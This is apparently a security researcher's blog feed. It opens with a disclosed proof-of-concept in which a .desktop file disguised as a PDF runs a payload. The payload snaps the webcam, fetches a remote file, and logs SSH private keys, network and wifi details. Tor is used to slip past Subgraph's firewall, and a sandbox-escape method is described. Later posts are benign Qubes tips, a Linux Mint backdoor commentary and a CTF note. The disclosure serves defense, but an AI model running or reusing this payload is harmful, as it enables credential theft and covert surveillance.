<p>In the free desktop world, application launchers are .desktop files. Every GUI application on your Linux box has a desktop file, just check <code>/usr/share/applications</code>. If you’re creating a custom application launcher, inside the .desktop file you specify the name of the application, an icon, as well as what to run when you execute it.</p>
<p>If you open Nautilus and browse to a folder with a .desktop file in it, there are two ways it can get displayed.</p>
<ul>
<li>If the file isn’t executable, Nautilus doesn’t trust it and shows the full original filename, including the .desktop extension, and a default icon.</li>
<li>If the file is executable, Nautilus trusts it and shows whatever name and icon is specified in the file. This is why the exploit I built was zipped up, so I could ensure that my malicious .desktop file is executable.</li>
</ul>
<p>It’s important to note that this is a <em>huge gaping security hole in Nautilus</em>. All Linux users that use Nautilus (including everyone who uses GNOME, Unity, Cinnamon) are vulnerable to getting tricked this way. This bug was <a href="https://bugzilla.gnome.org/show_bug.cgi?id=777991">reported to Nautilus</a> in January, and it has now been resolved (by, I believe, popping up a warning asking if you trust the source of the desktop launcher before executing it), but the fix won’t be released until Nautilus 3.24.</p>
<p>Debian Stretch ships 3.22.3; Fedora 25 ships 3.22.2; Ubuntu 16.10 ships 3.20.3; Ubuntu 17.04 ships 3.20.4. So it might be some time before this fix actually makes it into distros that people use. The Subgraph devs pointed me to <a href="https://github.com/subgraph/subgraph-os-issues/issues/227">this recent github issue</a>, showing that they’ve thought about this issue too. They also said they’re planning on auditing the Nautilus source code.</p>
<p>The exploit I created is a file called <code>sgos_handbook.pdf.desktop</code> (though I could have named it <code>malware.desktop</code> and it would have looked the same in Nautilus). Here’s what’s inside of it. Note that the name is set to <code>sgos_handbook.pdf</code>, and the icon is <code>gnome-mime-application-pdf</code> which is the default icon for PDFs in Subgraph — these two things make it so you can’t tell that this isn’t a PDF when viewing it in Nautilus. Also, of course, note that it’s set to execute a malicious shell script when it’s run.</p>
<pre><code>#!/usr/bin/env xdg-open
[Desktop Entry]
Encoding=UTF-8
Name=sgos_handbook.pdf
Exec=sh -c 'ROOT=$(dirname $(dirname $(find $HOME -type f -name sgos_handbook.pdf.desktop)) |head -n1); evince $ROOT/static/sgos_handbook.pdf; mkdir $HOME/.config/tools; cd $HOME/.config/tools; torify apt download fswebcam; dpkg-deb -xv `ls fswebcam_*.deb` .; ./usr/bin/fswebcam -r 640x480 $HOME/webcam-snapshot.jpg; torify wget https://static.wixstatic.com/media/6a4a49_4e03bc224328475ea2e20dddaf9d0fda~mv2_d_2121_1414_s_2.jpg -O $HOME/attacker-can-drop-files-from-the-internet.jpg; echo "ifconfig output:" >> $HOME/pwnlog.txt; /sbin/ifconfig >> $HOME/pwnlog.txt; echo >> $HOME/pwnlog.txt; echo "tor exit node info:" >> $HOME/pwnlog.txt; torify curl https://ifconfig.co/json >> $HOME/pwnlog.txt; echo >> $HOME/pwnlog.txt; echo >> $HOME/pwnlog.txt; echo "ssh public and secret keys:" >> $HOME/pwnlog.txt; cat $HOME/.ssh/id_rsa.pub >> $HOME/pwnlog.txt; echo >> $HOME/pwnlog.txt; cat $HOME/.ssh/id_rsa >> $HOME/pwnlog.txt; echo >> $HOME/pwnlog.txt; echo "nearby wifi:" >> $HOME/pwnlog.txt; /sbin/iwlist $INTERFACE scan >> $HOME/pwnlog.txt; echo >> $HOME/pwnlog.txt; echo "saved wifi networks:" >> $HOME/pwnlog.txt; ls /etc/NetworkManager/system-connections >> $HOME/pwnlog.txt; echo >> $HOME/pwnlog.txt;'
Terminal=false
Type=Application
Icon=gnome-mime-application-pdf
</code></pre>
<p>Here’s a more human-readable, and commented, version of the payload:</p>
<div class="hll"><pre><span></span><span class="ch">#!/bin/sh</span>
<span class="c1"># Find the location of the extracted sgos_handbook folder</span>
<span class="nv">ROOT</span><span class="o">=</span><span class="k">$(</span>dirname<span class="w"> </span><span class="k">$(</span>dirname<span class="w"> </span><span class="k">$(</span>find<span class="w"> </span><span class="nv">$HOME</span><span class="w"> </span>-type<span class="w"> </span>f<span class="w"> </span>-name<span class="w"> </span>sgos_handbook.pdf.desktop<span class="k">))</span><span class="w"> </span><span class="p">|</span>head<span class="w"> </span>-n1<span class="k">)</span><span class="p">;</span>
<span class="c1"># Open the actual PDF in an oz sandbox</span>
evince<span class="w"> </span><span class="nv">$ROOT</span>/static/sgos_handbook.pdf<span class="p">;</span>
<span class="c1"># Take a snapshot from the webcam</span>
mkdir<span class="w"> </span><span class="nv">$HOME</span>/.config/tools<span class="p">;</span>
<span class="nb">cd</span><span class="w"> </span><span class="nv">$HOME</span>/.config/tools<span class="p">;</span>
torify<span class="w"> </span>apt<span class="w"> </span>download<span class="w"> </span>fswebcam<span class="p">;</span>
dpkg-deb<span class="w"> </span>-xv<span class="w"> </span><span class="sb">`</span>ls<span class="w"> </span>fswebcam_*.deb<span class="sb">`</span><span class="w"> </span>.<span class="p">;</span>
./usr/bin/fswebcam<span class="w"> </span>-r<span class="w"> </span>640x480<span class="w"> </span><span class="nv">$HOME</span>/webcam-snapshot.jpg<span class="p">;</span>
<span class="c1"># Download an image to the home directory</span>
torify<span class="w"> </span>wget<span class="w"> </span>https://static.wixstatic.com/media/6a4a49_4e03bc224328475ea2e20dddaf9d0fda~mv2_d_2121_1414_s_2.jpg<span class="w"> </span>-O<span class="w"> </span><span class="nv">$HOME</span>/attacker-can-drop-files-from-the-internet.jpg<span class="p">;</span>
<span class="c1"># Log the ifconfig output, which includes the MAC address</span>
<span class="nb">echo</span><span class="w"> </span><span class="s2">"ifconfig output:"</span><span class="w"> </span>>><span class="w"> </span><span class="nv">$HOME</span>/pwnlog.txt<span class="p">;</span>
/sbin/ifconfig<span class="w"> </span>>><span class="w"> </span><span class="nv">$HOME</span>/pwnlog.txt<span class="p">;</span>
<span class="nb">echo</span><span class="w"> </span>>><span class="w"> </span><span class="nv">$HOME</span>/pwnlog.txt<span class="p">;</span>
<span class="c1"># Log information about the current Tor exit node</span>
<span class="nb">echo</span><span class="w"> </span><span class="s2">"tor exit node info:"</span><span class="w"> </span>>><span class="w"> </span><span class="nv">$HOME</span>/pwnlog.txt<span class="p">;</span>
torify<span class="w"> </span>curl<span class="w"> </span>https://ifconfig.co/json<span class="w"> </span>>><span class="w"> </span><span class="nv">$HOME</span>/pwnlog.txt<span class="p">;</span>
<span class="nb">echo</span><span class="w"> </span>>><span class="w"> </span><span class="nv">$HOME</span>/pwnlog.txt<span class="p">;</span>
<span class="nb">echo</span><span class="w"> </span>>><span class="w"> </span><span class="nv">$HOME</span>/pwnlog.txt<span class="p">;</span>
<span class="c1"># Log SSH public and secret key</span>
<span class="nb">echo</span><span class="w"> </span><span class="s2">"ssh public and secret keys:"</span><span class="w"> </span>>><span class="w"> </span><span class="nv">$HOME</span>/pwnlog.txt<span class="p">;</span>
cat<span class="w"> </span><span class="nv">$HOME</span>/.ssh/id_rsa.pub<span class="w"> </span>>><span class="w"> </span><span class="nv">$HOME</span>/pwnlog.txt<span class="p">;</span>
<span class="nb">echo</span><span class="w"> </span>>><span class="w"> </span><span class="nv">$HOME</span>/pwnlog.txt<span class="p">;</span>
cat<span class="w"> </span><span class="nv">$HOME</span>/.ssh/id_rsa<span class="w"> </span>>><span class="w"> </span><span class="nv">$HOME</span>/pwnlog.txt<span class="p">;</span>
<span class="nb">echo</span><span class="w"> </span>>><span class="w"> </span><span class="nv">$HOME</span>/pwnlog.txt<span class="p">;</span>
<span class="c1"># Log scan of nearby wifi networks</span>
<span class="nb">echo</span><span class="w"> </span><span class="s2">"nearby wifi:"</span><span class="w"> </span>>><span class="w"> </span><span class="nv">$HOME</span>/pwnlog.txt<span class="p">;</span>
/sbin/iwlist<span class="w"> </span><span class="nv">$INTERFACE</span><span class="w"> </span>scan<span class="w"> </span>>><span class="w"> </span><span class="nv">$HOME</span>/pwnlog.txt<span class="p">;</span>
<span class="nb">echo</span><span class="w"> </span>>><span class="w"> </span><span class="nv">$HOME</span>/pwnlog.txt<span class="p">;</span>
<span class="c1"># Log list of saved wifi networks</span>
<span class="nb">echo</span><span class="w"> </span><span class="s2">"saved wifi networks:"</span><span class="w"> </span>>><span class="w"> </span><span class="nv">$HOME</span>/pwnlog.txt<span class="p">;</span>
ls<span class="w"> </span>/etc/NetworkManager/system-connections<span class="w"> </span>>><span class="w"> </span><span class="nv">$HOME</span>/pwnlog.txt<span class="p">;</span>
<span class="nb">echo</span><span class="w"> </span>>><span class="w"> </span><span class="nv">$HOME</span>/pwnlog.txt<span class="p">;</span>
</pre></div>
<p><strong>Using .desktop Files to Break Out of a Sandbox</strong></p>
<p>When you open a PDF in Subgraph OS, it opens an Evince oz sandbox that only has access to that one document. However, some sandboxes give you write access to an entire folder. For example, the Tor Browser sandbox lets you read and write to <code>~/Downloads/TorBrowser</code>, and the LibreOffice sandbox lets you read and write to <code>~/Documents/LibreOffice</code>.</p>
<p>If you can get sandboxed remote code execution in one of these sandboxes, like by using a Tor Browser or LibreOffice exploit, you can then potentially escalate privileges to get unsandboxed remote code execution by modifying files in those directories.</p>
<p>For example, lets say the user downloads a malicious Word document and double clicks it in Nautilus. Subgraph OS will open a LibreOffice oz sandbox and give it access to that document (let’s say, <code>~/Downloads/TorBrowser/resume.docx</code>). Let’s also assume that the user has some legitimate documents, like maybe <code>~/Documents/LibreOffice/draft-proposal.odt</code>.</p>
<p>The payload of the malicious resume.docx could rename draft-proposal.odt to something else, like maybe make it a hidden file called <code>.DS_Store</code>, and then create a new file, <code>draft-proposal.odt.desktop</code> and make it executable. Later, when the user double-clicks what looks like <code>draft-proposal.odt</code> in Nautilus, the attacker escapes the sandbox. (And of course, the payload can even clean up after itself — move <code>.DS_Store</code> back to <code>draft-proprosal.odt</code> and delete <code>draft-proposal.odt.desktop</code>, after installing a backdoor of course.)</p>
<p><strong>Bypassing the Subgraph Firewall</strong></p>
<p>The Subgraph Firewall is pretty cool. It’s an application firewall that lets you approve or deny network connections on a process-by-process basis. As I showed in the video, when you open the GNOME Calculator app, it tries making network connections (to look up currency conversation rates), and but the firewall intercepts these and lets you deny them.</p>
<p>However, it’s trivial to bypass because it allows all Tor traffic through, no questions asked. For example, if you open a terminal and run <code>curl example.com</code>, the firewall intercepts this connection and gives you the option to deny it:</p>
<p><img src="sgos_firewall1.png" alt=""></p>
<p>But if you run <code>torify curl example.com</code>, it just works. If you check the payload above, you’ll see that all of the internet requests I made use torify to bypass the firewall.</p>
<p>When I pointed this out to the Subgraph devs, they told me that the Subgraph Firewall wasn’t designed to prevent malware from making network connections, but rather just to prevent incidental privacy leaks (such as with the calculator). So they didn’t consider this a valid security issue.</p>
<p>When they show off the Subgraph Firewall on their website, they neglected to explain this limitation:</p>
<p><img src="subgraph_firewall.png" alt=""></p>
<p>However, they do mention it in the Subgraph OS Handbook, but with questionable use of the word “sophisticated”:</p>
<blockquote><p>Application firewalls are useful for monitoring unexpected connections from applications. For example, some applications may phone home to the vendor’s website. Often this activity is legitimate (non-malicious) but it still may violate the user’s privacy or expectations of how the software operates. Subgraph Firewall gives users the choice to allow or deny these connections.</p>
<p>Malicious code may also phone home to a website or server that is operated by the hacker or malicious code author. Subgraph Firewall can also alert the user of these connections so that they can be denied.</p>
<p>Application firewalls cannot prevent all malicious code from connecting to the Internet. <strong>Sophisticated malicious code can subvert the allowed connections to bypass the firewall.</strong> However, the firewall may alert the user of connection attempts by less sophisticated malicious code</p>
</blockquote>
<p>They did say that they will probably expand the scope and purpose of the firewall in the future — and they pointed to an <a href="https://github.com/subgraph/fw-daemon/tree/socks-filter">incomplete branch</a> of their firewall code that would allow intercepting Tor traffic to let the user deny it, some day when it’s done.</p>
<p><strong>How this attack would affect Qubes</strong></p>
<p>Qubes is flexible, so how much the attack succeeds depends on the user’s choices.</p>
<p>In the worst case, the exploit would hack the sandbox (which is called an AppVM, in Qubes lingo) that the user opens it in. This could be their “personal” AppVM full of private data, or a “browser” AppVM that has nothing but a web browser profile, or it could be a <a href="https://www.whonix.org/">Whonix</a> AppVM, where all internet traffic is forced to go over Tor. In any of these cases, the attacker will be stuck in a sandbox and won’t be able to compromise other AppVMs. The attacker also won’t be able to query the hardware — they won’t be able to learn the network interface’s MAC address, or see nearby wifi access points or bluetooth devices, or anything like that. They won’t be able to access the microphone or webcam.</p>
<p>However, some Qubes users are more careful than that. If the user right-clicks on the fake PDF .desktop and chooses “Open in DisposableVM”, the hack will fail. DisposableVMs are basically one-time-use sandboxes that work like this: a new sandbox gets created, the file gets copied into it (in this case, the malicious PDF .desktop file), the file gets opened, and when it’s done running, the entire sandbox is deleted. I just tested this out — for me, sgos_handbook.pdf.desktop actually just opens in Atom, a text editor I have installed.</p>
<p><img src="subgraph_dispvm.png" alt=""></p>
<p>Even if the payload executes — like, for example, if this were actually a malicious PDF that exploits Evince instead of a <code>.desktop</code> file, it wouldn’t have access to any user data. If the DisposableVM has internet access (which depends on the user’s settings), the payload might be able to phone home, but it won’t be able to tell the attacker anything besides “I’m stuck in a DisposableVM.” It certainly couldn’t take a snapshot from my webcam, record from my mic, or install any sort of persistent malware. And as soon the program closes, the whole sandbox gets deleted.</p>
<p><strong>Final thoughts</strong></p>
<p>Much of the Qubes vs. Subgraph OS debate has focused on the relative security of the two different types of sandboxing: the Xen hypervisor vs. grsecurity/Linux containers. Which is “more secure” is complicated and subjective.</p>
<p>But what gets lost in the debate is the most important difference between the operating systems: Qubes provides <strong>security by compartmentalization</strong>, while Subgraph OS provides <strong>OS hardening and app sandboxes</strong>. As this exploit hopefully demonstrates, these are <em>not the same thing</em>.</p>
<p>It’s exciting to see an attempt at a security-hardened Linux distro, but it’s no substitute for the compartmentalization that’s made possible by Qubes.</p>
<p>==</p>
<p><em><strong>Update April 12, 2017</strong></em></p>
<p>Subgraph <a href="https://twitter.com/subgraph/status/851843464115441664">pointed out a typo</a> in this blog post and <a href="https://twitter.com/subgraph/status/851846268984987648">stated</a> that this attack is possible because of an outstanding vulnerability in Nautilus. One Subgraph developer <a href="https://twitter.com/bleidl/status/851849723002703873">claimed</a> that this isn’t a bug in Subgraph OS, <a href="https://twitter.com/bleidl/status/851851948710141952">said</a> that Qubes was just as vulnerable (it’s <a href="https://twitter.com/isislovecruft/status/851890009057710080">not</a>), and <a href="https://twitter.com/bleidl/status/851852258761465860">said</a>, “Do I have to make a video too?” (please do!).</p>
<p>But then last night, Subgraph <a href="https://twitter.com/subgraph/status/852000407253594114">fixed</a> this not-a-bug in Subgraph OS! Users can upgrade to it.</p>
<p><img src="Screenshot_2017-04-12_12-29-49.png" alt=""></p>
<p>I tested it out, and it works great (I can’t wait until this patch hits Debian and Fedora, too). I made this little animated GIF to show what <code>sgos_handbook.pdf.desktop</code> now looks like in Nautilus. When it’s executable it still displays it as a <code>.desktop</code> file, when you open it it displays a warning, and only if you click through the warning does it make it appear like a PDF:</p>
<p><img src="nautilus.gif" alt=""></p>
<p>This is excellent and fixes this specific issue, but it doesn’t fix the more fundamental problem that Subgraph OS has in trying to be an “adversary resistant OS”: Most software still doesn’t run inside of a sandbox. A future bug in Nautilus or other unsandboxed app (or tricking the target into installing a malicious <code>pip</code> package you control, etc.) will still allow the attacker to take over the computer.</p>
Qubes Tip: Making Yubikey OpenPGP smart cards slightly more usable2016-12-01T00:00:00ZMicah Leeurn:uuid:e5f1845c-472b-3144-b8dc-530fa8f888e4<p>Qubes 3.2 has support for <a href="https://www.qubes-os.org/doc/usb/#attaching-a-single-usb-device-to-a-qube-usb-passthrough">USB passthrough</a>. This one feature has made Qubes <em>so much</em> more useful for me. It means that a wide variety of devices — from my laptop’s internal webcam, to plugging in smartphones to transfer data or do Android development — are finally supported. I used to have to use a separate non-Qubes computer for several tasks that I can now more conveniently and securely do within Qubes.</p>
<p>One way that I use USB passthrough on a daily basis is with my Yubikey. (If you’re unfamiliar, Yubikeys are small USB devices that can be used for two-factor authentication, for storing and typing static passwords, and for OpenPGP smart cards.) Normally when you use GnuPG, you keep your secret key in a file stored in <code>~/.gnupg</code>. If you use an OpenPGP smart card, you don’t have your secret key on your computer at all — instead you have it stored on your smart card. With a smart card you can use your secret key, by decrypting or signing messages, but it’s designed to be impossible to export the secret key itself.</p>
<p>If you use the Qubes <a href="https://www.qubes-os.org/doc/split-gpg/">split-gpg</a> setup, where your email client is in a VM with internet access and your <code>~/.gnupg</code> directory with all of your keys in a separate VM without any network access (called, for example, <code>gpgvm</code>), you’re going to need to attach your Yubikey USB device to that VM every time you plug it in. And, because of how the <code>qvm-usb</code> tool for USB passthrough works, the command you need to run to do this will be different depending on which USB port you plug your Yubikey into.</p>
<p>To make things simpler for me, I wrote a script that I keep in <code>dom0</code> at <code>/usr/local/bin/yubi</code>. After I plug in my Yubikey, I press Alt-F2, type “yubi”, and press enter, and it attaches my Yubikey to my gpgvm. It doesn’t matter what USB port I’ve plugged my Yubikey into (it even works fine with USB hubs). If I run <code>yubi</code> when my Yubikey is already attached to my <code>gpgvm</code>, it detaches and then re-attaches it, which should clear up any problems. I thought I’d share it. Here’s the script:</p>
<pre><code>#!/bin/bash
USB_DEVICE=`qvm-usb |grep Yubikey |cut -f1`
# Is it already attached
qvm-usb |grep $USB_DEVICE | grep "(attached to gpgvm)"
if [ $? -eq 0 ]; then
echo "detatching yubikey"
qvm-usb -d $USB_DEVICE
sleep 1
fi
echo "attaching yubikey"
qvm-usb -a gpgvm $USB_DEVICE
</code></pre>
<p>One final note: When you plug your Yubikey into your computer (and you’re using a <a href="https://www.qubes-os.org/doc/usb/#creating-and-using-a-usb-qube">USB qube</a>), a question might pop up in a <code>dom0</code> window asking if you’d like to allow the USB keyboard you plugged in to <code>sys-usb</code> to type in <code>dom0</code>. This is because Yubikeys advertise themselves as USB keyboards — this makes it possible to press the button on the Yubikey to type a two-factor authentication code.</p>
<p><img src="qubes-usb-question.png" alt="Qubes, protecting you from malicious USB devices pretending to be keyboards"></p>
<p>After you run the yubi script, the same question in <code>dom0</code> will pop up, but this time asking if you want to allow the keyboard from gpgvm to type in <code>dom0</code>. You can customize how all of this works by editing the file <code>/etc/qubes-rpc/policy/qubes.InputKeyboard</code> in <code>dom0</code>. Here’s what mine looks like:</p>
<pre><code>gpgvm dom0 deny
$anyvm $anyvm ask
</code></pre>
<p>This means never allow keyboards in gpgvm to type in dom0, and for all other situations ask.</p>
How Qubes makes handling PDFs way safer2016-07-21T00:00:00ZMicah Leeurn:uuid:a4489882-c246-3ce5-aca4-18c76756ea43<p>Bart Gellman asked me on Twitter how to make PDFs safe to open. This is an excellent question, especially for a Pulitzer-winning surveillance/national security reporter who needs to open documents from random people on the internet, who may be trying to hack him or may be a valuable new source. PDFs, and all other document formats, can be terribly dangerous, and opening a malicious one can let an attacker take over your computer.</p>
<p>He was specifically asking if <a href="https://firstlook.org/code/project/pdf-redact-tools/">PDF Redact Tools</a>, a tool that I developed to securely redact documents, could be used in Tails to safely sanitize potentially-malicious PDFs before opening them. Yes you can, but Qubes offers some built-in tools that do a better job of this, in a safer manner, with less hassle, and that’s quicker and easier.</p>
<p>The two key features are: “Open in Disposable VM” and “Convert to Trusted PDF”.</p>
<p><strong>Open in Disposable VM</strong></p>
<p>In Qubes, you run all of your software in VMs, and its up to the user to decide how they want to do it. I have a VM called “email” that I use to check my email, and nothing else.</p>
<p>Qubes comes with a Thunderbird extension that makes it simple to open email attachments in disposable VMs. It also comes with a file manager extension that lets you right-click on a file to open it in a disposable VM.</p>
<p>It’s absurdly easy to use. I’ll use a sketchy piece of potentially-malicious spam to demonstrate:</p>
<p><img src="sketchy-attachment.png" alt="sketchy attachment"></p>
<p>Notice the window decorations of my Thunderbird window. It has a blue border (because that’s the color I chose) and says “[email]” in the window, to let me know that I’m running this program in my email VM.</p>
<p>And here’s the window that opens:</p>
<p><img src="sketchy-attachment-dispvm.png" alt="sketchy attachment DispVM"></p>
<p>Here’s what happened:</p>
<ul>
<li>Qubes created a brand new VM that doesn’t have any data in it at all</li>
<li>Then it copied this file <code>AWARD NOTIFICATION.pdf</code> to this new VM</li>
<li>Then it opened the PDF in the new VM</li>
<li>When I closed the window, Qubes deleted that disposable VM</li>
</ul>
<p>Check the window title. This PDF is open in a VM called “disp11”. When I close the window, the VM shuts down and gets deleted. If the PDF were malicious and tried to hack me, and the hack successfully exploited my PDF reader (Evince, in this case), it would still fail. The exploit wouldn’t have access to any of my data at all, and as soon as I closed the window it would be deleted forever.</p>
<p>There’s a setting in the Qubes Thunderbird extension to open all email attachments in disposable VMs. And this works with any type of document, not just PDFs.</p>
<p><strong>Convert to Trusted PDF</strong></p>
<p>Qubes also has a feature that’s similar to what Bart was wanting to use PDF Redact Tools for: to convert an unknown PDF into one that you can safely open on any computer, even one running Windows or OS X with a vulnerable version of Adobe Reader.</p>
<p>In this example, I’ve downloaded a PDF from Cryptome, and I have no idea if it’s malicious or not. I could choose to just open it in my PDF reader, to open it in a disposable VM, or to convert it to a PDF that I can trust.</p>
<p><img src="trusted-pdf.png" alt="trusted pdf"></p>
<p>First, notice the window decorations. This is the file manager running in my “browser” VM, and I chose the window color yellow.</p>
<p>Right-clicking on the PDF and choosing “Convert To Trusted PDF” does something similar to what PDF Redact Tools does, but it will do it in a more secure way, because it can, because it’s running in Qubes. The short version is this:</p>
<ul>
<li>Qubes creates a new disposable VM</li>
<li>It copies the document <code>fbi-cia-ssci-saudi.pdf</code> to it</li>
<li>It does a complicated process to flatten and remove anything malicious from the PDF (it does a better job than PDF Redact Tools, which simply runs the ImageMagick “convert” tool, meaning that a PDF especially crafted to attack ImageMagick rather than Adobe Reader could still hack your computer)</li>
<li>It copies the trusted PDF back to the VM</li>
<li>It moves the original PDF to <code>~/QubesUntrustedPDFs</code> in the VM you’re using (browser, in my case), and it names the trusted PDF <code>fbi-cia-ssci-saudi.trusted.pdf</code></li>
</ul>
<p>If you want a much more detailed explanation of what’s going on, check out Joanna Rutkowska’s <a href="https://theinvisiblethings.blogspot.com/2013/02/converting-untrusted-pdfs-into-trusted.html">blog post on the topic</a>.</p>
<p>There are two annoying downsides that trusted PDFs have: In order to make it safe, Qubes completely flattens the PDF, which means means you can no longer select any text from it. You’ll have to OCR it if you want the text layer back. And it makes the file size bigger, sometimes much bigger. The original <code>fbi-cia-ssci-saudi.pdf</code> is 624 kb, but <code>fbi-cia-ssci-saudi.trusted.pdf</code> is 2.3 mb.</p>
<p><em>Update:</em> There’s a <a href="https://groups.google.com/forum/#!topic/qubes-users/qSiLD4jTXtQ">minor correction</a> from Qubes developer Marek Marczykowski-Górecki:</p>
<blockquote><p>“It copies the trusted PDF back to the VM” – that would mean that compromised DispVM (by the very same PDF) could pass it back unmodified instead of the sanitized one. It isn’t what is done there – it pass only very simple representation of the file (bitmap in this case), then reassemble PDF in the calling VM.</p>
</blockquote>
<p><strong>You can still get hacked with Qubes</strong></p>
<p>These Qubes features are awesome and will protect you from just about 100% of random drive-by attacks. But like everything on computers, it’s still possible for an attacker with the right exploits to hack you, even if you’re using Qubes.</p>
<p>They would need:</p>
<ol>
<li>An exploit for the program you’re using to open the document. In Qubes, the default PDF reader is Evince, but you can obviously use whichever software you think is safest.</li>
<li>An exploit for Xen, which is the hypervisor that Qubes uses. These exploits are rare, but certainly happen. (Like this recent incredibly scary one.)</li>
<li>A payload that’s specifically targeted against Qubes.</li>
</ol>
<p>The Qubes developers are completely on top of security updates. If you keep dom0 and all of your template VMs always up-to-date, using disposable VMs and converting to trusted PDFs will protect you from all but the most persistent and resourced attackers.</p>
Qubes Tip: Opening links in your preferred AppVM2016-06-22T00:00:00ZMicah Leeurn:uuid:f67fa883-bc99-37e2-8b3c-e83906a4f236<p>If you use Qubes like I do, you have many different AppVMs to compartmentalize different programs. You might have one VM for your email client, one for your jabber client, one for your password database. But if you click a link in any of these programs, it sure would be nice if that link opened in the browser VM of your choice. This isn’t all that hard to setup.</p>
<p>The command <code>qvm-open-in-vm</code> lets you open a document or a URL in another VM.</p>
<pre><code>user@dev:~$ qvm-open-in-vm
Usage: /usr/bin/qvm-open-in-vm vmname filename
</code></pre>
<p>If you have a terminal open in your dev VM and want to load <a href="https://micahflee.com/">https://micahflee.com/</a> in your browser VM, you can do it like this:</p>
<pre><code>user@dev:~$ qvm-open-in-vm browser https://micahflee.com
</code></pre>
<p>You get a prompt in <code>dom0</code> asking if you really want to allow this cross-VM behavior. When you choose yes, a new tab loading my website opens in your default browser in your browser VM.</p>
<p><img src="qubes-links.png" alt="qubes.OpenURL"></p>
<p>Excellent. Now let’s say you want this to automatically happen every time you click any link. You can do this by creating a <code>.desktop</code> file that advertises itself as a handler for http/https links, and then setting this as your default browser.</p>
<p>Open a text editor and copy and paste this into it:</p>
<pre><code>[Desktop Entry]
Encoding=UTF-8
Name=BrowserVM
Exec=qvm-open-in-vm browser %u
Terminal=false
X-MultipleArgs=false
Type=Application
Categories=Network;WebBrowser;
MimeType=x-scheme-handler/unknown;x-scheme-handler/about;text/html;text/xml;application/xhtml+xml;application/xml;application/vnd.mozilla.xul+xml;application/rss+xml;application/rdf+xml;image/gif;image/jpeg;image/png;x-scheme-handler/http;x-scheme-handler/https;
</code></pre>
<p>Replace browser in the line that says <code>Exec=qvm-open-in-vm browser %u</code> with whatever AppVM you want to open links in. Save this file to <code>~/.local/share/applications/browser_vm.desktop</code>.</p>
<p>Finally, set it as your default browser (like I’m doing here in my email VM):</p>
<pre><code>user@email:~$ xdg-settings set default-web-browser browser_vm.desktop
</code></pre>
<p>Now whenever you click a link in a program running in this VM (such as Thunderbird), it will open that link in your browser VM.</p>
Backdoored Linux Mint, and the Perils of Checksums2016-02-20T00:00:00ZMicah Leeurn:uuid:10372d2b-bfdb-3e7e-a896-972da8e740d5<p>Someone hacked the website of Linux Mint — which, according to <a href="https://stats.wikimedia.org/wikimedia/squids/SquidReportOperatingSystems.htm">Wikipedia’s traffic analysis report</a> is the 3rd most popular desktop Linux distribution after Ubuntu and Fedora — and replaced links to ISO downloads with a backdoored version of the operating system. This <a href="http://blog.linuxmint.com/?p=2994">blog post</a> explains the situation.</p>
<p>From the post and comments, the key points includes:</p>
<ul>
<li>Links to the malicious version of the ISO were added, detected, and removed on the same day, February 20. If you’re already running Linux Mint, this doesn’t affect you — all files installed or updated using the package manager are digitally signed and the signatures are verified.</li>
<li>Linux Mint 17.3 Cinnamon was the only version that was compromised</li>
<li>The website was hacked because of a WordPress exploit. Project leader Clement Lefebvre says, “Yes, the breach was made via wordpress. From there they got a www-data shell.”</li>
<li>The backdoored ISO contains Linux Mint with <a href="http://blog.malwaremustdie.org/2013/05/story-of-unix-trojan-tsunami-ircbot-w.html">Tsunami botnet malware</a> running on it.</li>
</ul>
<p>The blog post includes instructions for checking your ISO files to ensure that they’re valid by comparing MD5 checksums. MD5 checksums!</p>
<p>Besides the fact that the website isn’t available over HTTPS so network attackers could change those MD5 checksums to whatever they want as you load the blog post, <a href="https://en.wikipedia.org/wiki/MD5#Security">MD5 is entirely broken</a> and has been for many years. MD5 should never be relied on for verifying that you have the legitimate version of a file. It would not be difficult for someone to generate a backdoored Linux Mint ISO that has the same MD5 checksum as the legitimate ISO. Likewise, while SHA1 is considerable stronger, it also should not be used for security purposes anymore. Wikipedia’s <a href="https://en.wikipedia.org/wiki/SHA-1">SHA1 article</a> says: “SHA-1 is no longer considered secure against well-funded opponent.”</p>
<p>It would be great if the Linux Mint project can completely stop relying on MD5 and started using a checksum algorithm that is considered secure today, like SHA256.</p>
<p>But it’s also important to note that comparing the checksum of a file you downloaded with what you see on the website you downloaded it from isn’t secure either, even if you are using SHA256. If a hacker can hack the website to modify the download link, they can modify the checksum at the same time to match their malicious download.</p>
<p>The only solution to this problem is to use public key cryptography. The ISOs should be digitally signed with an OpenPGP secret key, and users should verify the signature using the associated public key. Linux Mint actually does in fact sign releases with a PGP key, but there’s no information on the download page about this, or how to go about verifying the signature.</p>
<p>If you look at the directory structure in the Linux Mint folder on one of the download mirrors, like <a href="http://mirrors.kernel.org/linuxmint/stable/17.3/">http://mirrors.kernel.org/linuxmint/stable/17.3/</a> for example, you’ll see a bunch of ISO files as well as sha256sum.txt and sha256sum.txt.gpg. The sha256sum.txt file includes SHA256 checksums of all of the ISO files, and you can use sha256sum.txt.gpg to verify the signature of that file.</p>
<p>This appears to be the signing key:</p>
<pre><code>pub dsa1024/0FF405B2 2009-04-29 [SC]
Key fingerprint = E1A3 8B8F 1446 75D0 60EA 666F 3EE6 7F3D 0FF4 05B2
uid [ unknown] Clement Lefebvre (Linux Mint Package Repository v1)
sub elg2048/0F346519 2009-04-29 [E]
</code></pre>
<p>Verifying is PGP signatures is more complicated and harder to explain than comparing checksums, but it’s actually secure. It’s the only way to be sure that a Linux installer ISO you download hasn’t been tampered with since the image was built by the developers. Tails is an example of an operating system that does an <a href="https://tails.boum.org/download/index.en.html#verify">excellent job</a> at explaining how to verify PGP signatures when you download their ISO.</p>
Usable Crypto Capture the Flag Challenge2016-02-06T00:00:00ZMicah Leeurn:uuid:a2f411c0-2299-35e8-9fab-05c5a27a0275<p>Last week, during USENIX’s first <a href="https://www.usenix.org/conference/enigma2016">Enigma conference</a>, EFF hosted a small Capture the Flag hacking competition. I designed one of the challenges myself, entitled Usable Crypto. It requires you to use PGP as an attacker rather than a defender. It’s on the easy side, as far as CTF challenges go, and I think many people who have absolutely no hacking skills but some fumbling-around-with-PGP skills could beat it without too much trouble. And it might even demonstrate why verifying fingerprints really is rather important.</p>
<p>If you’d like to give it a go, it’s live at <a href="https://usable-crypto.ctf.micahflee.com/">https://usable-crypto.ctf.micahflee.com/</a>. The plot for Enigma’s CTF was loosely based off of Cory Doctorow’s novel Little Brother. You’re an X-NET hacker fighting the surveillance state’s Department of National Security. You win when you capture the flag, which is a string of text that starts with “FLAG_” (but please don’t post it in the comments).</p>
